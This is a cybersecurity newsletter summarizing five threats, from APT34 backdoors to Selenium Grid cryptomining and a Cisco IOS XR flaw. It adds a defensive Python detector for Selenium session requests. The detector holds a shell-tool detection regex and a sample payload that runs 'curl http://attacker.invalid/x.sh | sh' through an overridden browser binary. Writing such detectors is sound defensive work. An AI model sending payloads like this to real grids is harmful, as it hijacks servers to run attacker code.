Today’s Cybersecurity Threats and Trends - 09/12/2024

A Black (Hat) Dragon hits it big with Quad7's.

Before we dive in, I would like to thank all of you for supporting us with your subscription! My goal is to bring both actionable insights and information regarding cybersecurity threats to the non-tech and technical professional alike. If this sounds like something that would help someone you know, please share the newsletter!

Please check out our partners and sponsors! It goes a long way in our quest to get everyone involved in cybersecurity.

1. OilRig’s Iraqi Infiltration

Primary Threat: APT34, also known as OilRig and attributed to Iran, has been targeting Iraqi government networks in a cyber-espionage campaign documented by Check Point Research. The group is deploying new malware tools, including the Veaty and Spearal backdoors, which hide their command-and-control traffic in email and DNS respectively, to get into government systems, exfiltrate sensitive data, and maintain long-term persistence. The campaign fits the group's wider push to expand its operations across the Middle East.

  • MITRE Tactics: Initial Access, Persistence, Exfiltration

  • Risk: High – Targeted government attacks with long-term espionage goals represent a significant national security threat.

2. Botnet Behemoth: Quad7’s SOHO Surge

Primary Threat: The Quad7 botnet is built from compromised small office/home office (SOHO) routers and edge devices, not from large data-center systems, and it is growing. Sekoia TDR research shows the operators expanding beyond the TP-Link routers first associated with the botnet to ASUS routers, Zyxel VPN appliances, and other consumer and small-business gear, and rolling out new backdoors and relay tooling. Sekoia's earlier reporting tied the botnet to relaying password-spraying attacks against Microsoft 365 accounts, so a hijacked router becomes an anonymizing hop for attacks on other organizations as well as a foothold that can be repurposed for further malware distribution or denial of service. Small businesses and remote workers running unpatched or default-credential routers are the population at risk.

  • MITRE Tactics: Command and Control, Impact

  • Risk: High – Unsecured SOHO routers can be exploited to launch larger-scale attacks, making this a growing concern for small businesses.

3. Selenium Servers Suffer Sabotage

Primary Threat: Attackers are abusing Selenium Grid servers, the hubs commonly used to automate web application testing, for cryptomining and proxyjacking. According to Cado Security research, the targets are misconfigured grids exposed to the internet; Selenium Grid does not authenticate clients by default, so anyone who can reach the WebDriver API can open a session and have the node run a miner or proxyware that sells the server's bandwidth. The ease of abuse is the whole story here: an exposed grid will launch whatever a session request tells it to.

  • MITRE Tactics: Execution, Impact

  • Risk: Medium – While not affecting critical infrastructure, these attacks can significantly affect cloud costs and performance for companies reliant on Selenium.
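
The Selenium Grid abuse above, as an added example that is not part of the original newsletter or of Cado's research: a client opens a grid session with a JSON "capabilities" object, and the `goog:chromeOptions` entry can name the browser `binary` and its `args`, which is the publicly documented way an unauthenticated client turns the grid into a command runner. The function below inspects a `POST /session` body and flags a binary outside an allowlist or shell-looking arguments; the allowlist, the sample requests, and the `attacker.invalid` host are all constructed for this example.

```python
"""Flag Selenium Grid session requests that override the browser binary
or smuggle shell commands in browser arguments."""
import json
import re

# Constructed allowlist of browser executables a grid node may launch
# (an assumption for this example; use the real paths on your nodes).
ALLOWED_BINARIES = {
    "/usr/bin/google-chrome",
    "/usr/bin/chromium",
    "/opt/google/chrome/chrome",
}

# Tokens that have no place on a browser launch line.
SUSPICIOUS_ARG = re.compile(
    r"(curl|wget|bash|/bin/sh|python|\||;|\$\(|https?://)", re.I
)


def _candidate_caps(body):
    """Yield every capability dict a session request can carry:
    W3C alwaysMatch / firstMatch plus the legacy desiredCapabilities."""
    w3c = body.get("capabilities")
    if isinstance(w3c, dict):
        if isinstance(w3c.get("alwaysMatch"), dict):
            yield w3c["alwaysMatch"]
        for entry in w3c.get("firstMatch") or []:
            if isinstance(entry, dict):
                yield entry
    legacy = body.get("desiredCapabilities")
    if isinstance(legacy, dict):
        yield legacy


def inspect_session_request(raw_json):
    """Return a list of findings for one POST /session body; empty means clean."""
    findings = []
    try:
        body = json.loads(raw_json)
    except json.JSONDecodeError:
        return ["body is not valid JSON"]
    if not isinstance(body, dict):
        return ["body is not a JSON object"]
    for caps in _candidate_caps(body):
        opts = caps.get("goog:chromeOptions")
        if not isinstance(opts, dict):
            continue
        binary = opts.get("binary")
        if binary is not None and binary not in ALLOWED_BINARIES:
            findings.append(f"browser binary overridden: {binary}")
        for arg in opts.get("args") or []:
            if SUSPICIOUS_ARG.search(str(arg)):
                findings.append(f"suspicious browser arg: {arg}")
    return findings


# Constructed sample requests (not captured traffic).
BENIGN = json.dumps({"capabilities": {"alwaysMatch": {
    "browserName": "chrome",
    "goog:chromeOptions": {"args": ["--headless=new", "--window-size=1280,800"]},
}}})

MALICIOUS = json.dumps({"capabilities": {"alwaysMatch": {
    "browserName": "chrome",
    "goog:chromeOptions": {
        "binary": "/usr/bin/python3",
        "args": ["-c", "import os; os.system('curl http://attacker.invalid/x.sh | sh')"],
    },
}}})

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, inspect_session_request(req) or "clean")
```

Run it over the request log of a hub you operate, or wire it into a reverse proxy in front of the grid; the real fix is to keep the grid off the public internet and reachable only from the CI runners that need it, since the grid itself will not refuse these sessions.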

4. DragonRank Raises Rogue Results

Primary Threat: The DragonRank campaign uses black hat SEO to poison search engine results and steer users to malicious websites. Cisco Talos attributes it to a Chinese-speaking actor that breaks into Windows IIS web servers through web application flaws, installs a malicious IIS module (BadIIS) alongside the PlugX backdoor, and uses the hijacked servers to game rankings for popular search terms and redirect visitors to scam sites. Unsuspecting users who click those results may end up infected with malware or tricked into handing over sensitive information.

  • MITRE Tactics: Initial Access, Exfiltration

  • Risk: Medium – This SEO poisoning campaign can affect both individuals and businesses, leading to compromised systems and data theft.

5. Cisco Closes Critical Security Gap

Primary Threat: Cisco's September bundled publication for IOS XR software patches several high-severity vulnerabilities, among them CVE-2024-20398, a CLI flaw that lets an authenticated, local user with a low-privileged account pass crafted arguments to certain commands, gain read/write access to the underlying file system, and escalate to root. It is a privilege-escalation bug rather than an unauthenticated remote code execution flaw, but root on a core router is full device compromise. Cisco advises administrators to move to the fixed releases promptly.

  • MITRE Tactics: Execution, Privilege Escalation

  • Risk: High – Cisco rates the flaw High (CVSS 8.8) and exploitation requires an existing login, but the outcome is full control of the device, so network operators should patch without delay.

IN SUMMARY:

Today’s cybersecurity news showcases a variety of attacks and vulnerabilities, from Iran’s APT34 targeting Iraqi government agencies to the Quad7 botnet compromising small office routers.

With malicious actors abusing everything from Selenium Grid servers to search engines, it’s crucial to stay vigilant.

Also, make sure to patch your Cisco systems and remain cautious when browsing online.

And now, it’s that time… All together kids!
“It's better to be paranoid than to be pwnd!”

J.W.

(P.S. Check out our partners! It goes a long way to support this newsletter!)